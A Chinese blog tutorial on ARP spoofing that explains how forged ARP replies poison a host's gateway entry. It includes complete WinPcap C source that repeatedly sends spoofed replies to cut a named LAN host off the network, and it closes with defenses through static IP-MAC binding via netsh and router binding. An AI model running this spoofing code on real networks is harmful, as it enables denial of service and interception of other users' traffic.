一、ARP攻击
我们先来看ARP的功能:ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。
ARP的具体实现方式,我在《ARP协议(1)什么是ARP协议》已有说明:
Q:这张映射表是如何生成的?
A:
(1)这张表中,每条记录(非静态)的生存时间一般为20分钟,起始时间从被创建开始算起,一旦过期,将在这张表中删除。(手动删除全部,可以用 arp -d *命令)。
(2)当A主机要发送信息给B时,A先在ARP高速缓存里查询B的IP是否有对应的MAC地址,如果有则把B IP对应的MAC地址取出封装在数据包里,然后发送出去。
(3)如果A在ARP高速缓存里没有找到B IP对应的MAC,则向A所在的局域网内广播或者询问网关(路由):谁有B IP的MAC,请告诉A。
(4)如果B和A是同一个局域网,B回这条信息,并把B的MAC地址带上,A再把B的IP和MAC写入到ARP的高速缓存里(一般有效时间为20分钟)。
(5)如果B和A不是同一个局域网,并且A所在的网关知道(或间接知道(询问和发包))B的MAC,则网关发消息给A,并且带上B的MAC地址。A收到消息后,再把B的IP和MAC写入到ARP的高速缓存里(一般有效时间为20分钟)。
(6)如果没人回应,则超时,对方不可达。
问题出在,在(4)中,如果主机F,向A发出了响应,说A询问IP的MAC是x(并非是正确的B的MAC),A收到后把它写入IP-MAC缓存,以后A向B发请求,全部都到F去了。这就产生了欺骗。
如果主机F伪造的是局域网中网关的MAC,则与F同局域网,被F攻击的主机就上不了网(因为被攻击的主句发向网关的数据包全部奥F主机上了),直到被攻击的主机中IP-MAC缓存过期,获取到正确的网关地址(IP-MAC)。
从上面的分析可以知道,要实现ARP攻击,只要在局域网中向被攻击的主机发送伪造的ARP响应包即可,所以要编码实现也就很简单了。
上篇,已经可以发送ARP数据包:
/* 功能: src_mac 向局域网广播:target_ip 192.168.1.111 的 mac 是多少 */ int Text1(Arp *arp) { u_char dest_mac[6] = {0xFF,0xFF,0xFF,0xFF,0xFF,0xFF};// 广播 u_char src_mac[6] = {0xF0,0x7B,0xCB,0xA3,0x15,0x85};// 源mac地址 F0-7B-CB-A3-15-85 u_char sender_mac[6] = {0xF0,0x7B,0xCB,0xA3,0x15,0x85}; // 发送端mac F0-7B-CB-A3-15-85 u_char sender_ip[4] = {0xC0,0xA8,0x01,0x65}; //发送端IP地址 192.168.1.101 u_char target_mac[6] = {0x00,0x00,0x00,0x00,0x00,0x00}; // 因为不知道mac,所以mac为空 u_char target_ip[4] = {0xC0,0xA8,0x01,0x6F}; // 目的端ip 192.168.1.111; if(PacketArpRequest(arp,dest_mac,src_mac,sender_mac,sender_ip,target_mac,target_ip) == -1) { printf("Packet arp request error\n"); return -1; } return 0; }
我们只要修改Text1函数里面的这些参数即可,如下:
/* 实验的主机 xxh_mac: xxh机器的mac xxh_ip: xxh机器的ip route_mac: 路由器的mac route_ip: 路由器的ip mobile_mac: 手机的mac mobile_ip: 手机的ip broadcast: 广播地址 xl_mac: xl机器的mac xl_ip: xl机器的ip */ u_char xxh_mac[6] = {0xF0,0x7B,0xCB,0xA3,0x15,0x85}; u_char xxh_ip[4] = {0xC0,0xA8,0x00,0x68}; u_char route_mac[6] = {0x80,0x89,0x17,0xCF,0xE6,0x6E}; u_char route_ip[4] = {0xC0,0xA8,0x00,0x01}; u_char mobile_mac[6] = {0x78,0xA8,0x73,0x82,0xBE,0xA4}; u_char mobile_ip[4] = {0xC0,0xA8,0x00,0x66}; u_char broadcast[6] = {0xFF,0xFF,0xFF,0xFF,0xFF,0xFF}; u_char xl_mac[6] = {0x00,0x21,0x00,0x29,0x75,0x04}; u_char xl_ip[4] = {0xC0,0xA8,0x00,0x6C};//192.168.0.108
/* 欺骗主机xl 只告诉xl这台机器,route_ip的Mac是xxh_mac */ int Text3(Arp *arp) { //broadcast route_mac route_ip mobile_mac mobile_ip xxh_mac xxh_ip if(PacketArpReplay(arp,xl_mac,xxh_mac,xxh_mac,route_ip,xxh_mac,xxh_ip) == -1) { printf("Packet arp request error\n"); return -1; } return 0; }
把包发出去之后,xl这台机器就无法上网了,我们在查询xl的arp缓存:
从上面看192.168.0.1对应的mac为192.168.0.104的mac了(f0-7b-cb-a3-15-85为xxh192.168.0.104主机的mac),主机xl就再也上不了网了,直到它获取到正确的网关IP-MAC。
ARP攻击的范围:是在局域网中。
ARP攻击可以做:
(1)通过ARP欺骗,我们可以获取到被攻击欲发送的所有数据包。
(2)通过ARP欺骗,可以让被攻击的机器无法正常上网。
居然利用ARP漏洞可以进行攻击,那,还可以做些有益的事么?
走在回家的路上,我yy了一种可用方法,但是在实际生产中,也许会用不到,但可以提供为一种思路:
在分布式部署中,如果某台机器出了故障,此时就需要把访问到该机器的流量导向到别的机器,此时ARP就可以排上用场了(怎么用?你该知道了吧?),但是在实际生产环境中,会有更好的解决方案,今后我们在详细来聊。
二、ARP防护
从上面可知,ARP攻击,主要是利用了ARP的漏洞:主机在查询不到IP-MAC缓存,向局域网发出询问请求,从而被不法攻击。
进而可知,攻击的前提是,主机在IP-MAC查询不到,才有被攻击的可能,那如果我在IP-MAC查到了,那就避免了ARP攻击?
对头!
我们之前有说过,ARP缓存的一般有效时间是20分钟,那如何让我们在IP-MAC查到相应的消息呢?
绑定IP-MAC!(有点类似绑定路由的概念)
这张图的最后一列“类型”,有动态和静态。动态就是临时缓存(20分钟),静态就是孤单绑定。
如何绑定?
1、查看网络状态
netsh i i show in
我电脑是活跃可用用的网络适配器的Idx是12
2、设置IP <---> MAC
netsh -c "i i" add neighbors [Idx序号] [ip地址] [mac地址]
如图:
192.168.1.1 与 a8-57-4e-5c-92-56 就绑定了。
对于网络管理员来说,还可以在网关进行绑定,如图:
这个页面是我家的路由器(手机上登录的,所以图片看来比较小)。
上面有提供绑定按钮操作,绑定后,对路由也就比较安全了。
ps:现在想起来,在迅雷的时候,新领的电脑要上网的话,需要把电脑的MAC报给运维同事,然后才可以上网。一直不清楚他们要电脑的MAC干嘛,原来就在于此啊。
同时,也可以装一些ARP防火墙或软件(我猜,他们的原理也不过如此)
好了,整个ARP系列就完成了,大家看得如何,欢迎大家来讨论交流:
公众号,搜索echo,或扫下面的二维码,进行关注交流
源码:
<span style="font-size:14px;">#if 0 #include <stdlib.h> #include <stdio.h> // pcap_findalldevs_ex #define HAVE_REMOTE #include <pcap.h> /* 实验的主机 xxh_mac: xxh机器的mac xxh_ip: xxh机器的ip route_mac: 路由器的mac route_ip: 路由器的ip mobile_mac: 手机的mac mobile_ip: 手机的ip broadcast: 广播地址 xl_mac: xl机器的mac xl_ip: xl机器的ip */ u_char xxh_mac[6] = {0xF0,0x7B,0xCB,0xA3,0x15,0x85}; u_char xxh_ip[4] = {0xC0,0xA8,0x00,0x68}; u_char route_mac[6] = {0x80,0x89,0x17,0xCF,0xE6,0x6E}; u_char route_ip[4] = {0xC0,0xA8,0x00,0x01}; u_char mobile_mac[6] = {0x78,0xA8,0x73,0x82,0xBE,0xA4}; u_char mobile_ip[4] = {0xC0,0xA8,0x00,0x66}; u_char broadcast[6] = {0xFF,0xFF,0xFF,0xFF,0xFF,0xFF}; u_char xl_mac[6] = {0x00,0x21,0x00,0x29,0x75,0x04}; u_char xl_ip[4] = {0xC0,0xA8,0x00,0x6C};//192.168.0.108 // 以太网的首部 typedef struct EthHead { u_char dest_mac[6]; // 以太网的目的地址 u_char src_mac[6]; // 以太网的源地址 u_char type[2]; // 帧类型 ARP:0x0806 }EthHead; // ARP数据包 typedef struct ArpMsg { u_char mac_type[2]; // 硬件类型 以太网: 1 u_char protocal_type[2]; // 协议类型 IP地址:0x0800 u_char mac_len; // 硬件地址长度 6 u_char protocal_len; // 协议地址长度 4 u_char op[2]; // 操作字段 ARP请求:1 ARP应答:2 RARP请求:3 RARP应答:4 u_char sender_mac[6]; // 发送端以太网地址 u_char sender_ip[4]; // 发送端IP地址 u_char target_mac[6]; // 目的以太网地址 u_char target_ip[4]; // 目的IP地址 }ArpMsg; // 以太网ARP typedef struct Arp { EthHead eth_head; ArpMsg arpmsg; }Arp; /* 函数名: PacketArp 功 能: 封装ARP包 参 数: arp_req : Arp类型,出参 op : 操作字段 ARP请求:1 ARP响应:2 RARP请求:3 RARP相应:4 dest_mac : 以太网目的地址 src_mac : 以太网源地址 sender_mac:发送端以太网地址 sender_ip : 发送端IP地址 target_mac: 目的以太网地址 target_ip : 目的IP地址 返 回: 0正确,-1错误 */ int PacketArp(Arp *arp_req, u_char op, u_char dest_mac[6], u_char src_mac[6], u_char sender_mac[6], u_char sender_ip[4], u_char target_mac[6], u_char target_ip[4]) { if(arp_req == NULL) return -1; memcpy(arp_req->eth_head.dest_mac, dest_mac, 6); memcpy(arp_req->eth_head.src_mac, src_mac, 6); arp_req->eth_head.type[0] = 0x08; arp_req->eth_head.type[1] = 0x06; //arp_req->eth_head.type = htons(arp_req->eth_head.type); arp_req->arpmsg.mac_type[0] = 0x00; arp_req->arpmsg.mac_type[1] = 0x01; arp_req->arpmsg.protocal_type[0] = 0x08; arp_req->arpmsg.protocal_type[1] = 0x00; arp_req->arpmsg.mac_len = 0x06; arp_req->arpmsg.protocal_len = 0x04; arp_req->arpmsg.op[0] = 0x00; arp_req->arpmsg.op[1] = op; memcpy(arp_req->arpmsg.sender_mac, sender_mac, 6); memcpy(arp_req->arpmsg.sender_ip, sender_ip, 4); memcpy(arp_req->arpmsg.target_mac, target_mac, 6); memcpy(arp_req->arpmsg.target_ip, target_ip, 4); return 0; } // ARP 请求包 int PacketArpRequest(Arp *arp_req, u_char dest_mac[6], u_char src_mac[6], u_char sender_mac[6], u_char sender_ip[4], u_char target_mac[6], u_char target_ip[4]) { return PacketArp(arp_req,0x01,dest_mac,src_mac,sender_mac,sender_ip,target_mac,target_ip); } // ARP 响应包 int PacketArpReplay(Arp *arp_req, u_char dest_mac[6], u_char src_mac[6], u_char sender_mac[6], u_char sender_ip[4], u_char target_mac[6], u_char target_ip[4]) { return PacketArp(arp_req,0x02,dest_mac,src_mac,sender_mac,sender_ip,target_mac,target_ip); } // 打开网络适配器 pcap_if_t* choose_interface() { pcap_if_t *alldevs; pcap_if_t *d; int inum; int i=0; char errbuf[PCAP_ERRBUF_SIZE]; /* Retrieve the device list on the local machine */ if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1) { fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf); exit(1); } /* Print the list */ for(d=alldevs; d; d=d->next) { printf("%d. %s", ++i, d->name); if (d->description) printf(" (%s)\n", d->description); else printf(" (No description available)\n"); } if(i==0) { printf("\nNo interfaces found! Make sure WinPcap is installed.\n"); return NULL; } printf("Enter the interface number (1-%d):",i); scanf_s("%d", &inum); if(inum < 1 || inum > i) { printf("\nInterface number out of range.\n"); /* Free the device list */ pcap_freealldevs(alldevs); return NULL; } /* Jump to the selected adapter */ for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++); return d; } /* xxh(192.168.0.104) 广播: 192.168.0.102 的MAC是多少 结果:arp -a 没有结果 */ int Text1(Arp *arp) { u_char dest_mac[6] = {0xFF,0xFF,0xFF,0xFF,0xFF,0xFF}; u_char src_mac[6] = {0xF0,0x7B,0xCB,0xA3,0x15,0x85}; u_char sender_mac[6] = {0xF0,0x7B,0xCB,0xA3,0x15,0x85}; u_char sender_ip[4] = {0xC0,0xA8,0x00,0x68}; //发送端IP地址 192.168.0.104 u_char target_mac[6] = {0x00,0x00,0x00,0x00,0x00,0x00}; u_char target_ip[4] = {0xC0,0xA8,0x00,0x66}; //192.168.0.102; if(PacketArpRequest(arp,dest_mac,src_mac,sender_mac,sender_ip,target_mac,target_ip) == -1) { printf("Packet arp request error\n"); return -1; } return 0; } /* 全网欺骗 广播 route_ip 的Mac是 xxh_mac 导致除xxh机器外, 结果:所有的机器都上了了网络 */ int Text2(Arp *arp) { //broadcast route_mac route_ip mobile_mac mobile_ip xxh_mac xxh_ip if(PacketArpReplay(arp,broadcast,xxh_mac,xxh_mac,route_ip,xxh_mac,xxh_ip) == -1) { printf("Packet arp request error\n"); return -1; } return 0; } /* 欺骗xl 只告诉xl这台机器,route_ip的Mac是xxh_mac 结果:所有的机器都上了了网络 */ int Text3(Arp *arp) { //broadcast route_mac route_ip mobile_mac mobile_ip xxh_mac xxh_ip if(PacketArpReplay(arp,xl_mac,xxh_mac,xxh_mac,route_ip,xxh_mac,xxh_ip) == -1) { printf("Packet arp request error\n"); return -1; } return 0; } void main(int argc, char **argv) { pcap_t *fp; char errbuf[PCAP_ERRBUF_SIZE]; u_char packet[42]; int i; pcap_if_t *d = choose_interface(); if(d == NULL) { exit(1); } char *source = d->name; /* Open the output device */ if ( (fp= pcap_open(source, // name of the device 100, // portion of the packet to capture (only the first 100 bytes) PCAP_OPENFLAG_PROMISCUOUS, // promiscuous mode 1000, // read timeout NULL, // authentication on the remote machine errbuf // error buffer ) ) == NULL) { fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", argv[1]); return; } Arp arp; if(Text3(&arp) == -1) { return ; } memcpy(packet, (void*)&arp, 42); /* Send down the packet */ while(1) { if (pcap_sendpacket(fp, packet, 42 /* size */) != 0) { fprintf(stderr,"\nError sending the packet: %s\n", pcap_geterr(fp)); return; } printf("sleep(2000)\n"); Sleep(2000); } return; } #endif</span><span style="font-size: 14px;"> </span>
版权声明:本文为博主原创文章,未经博主允许不得转载。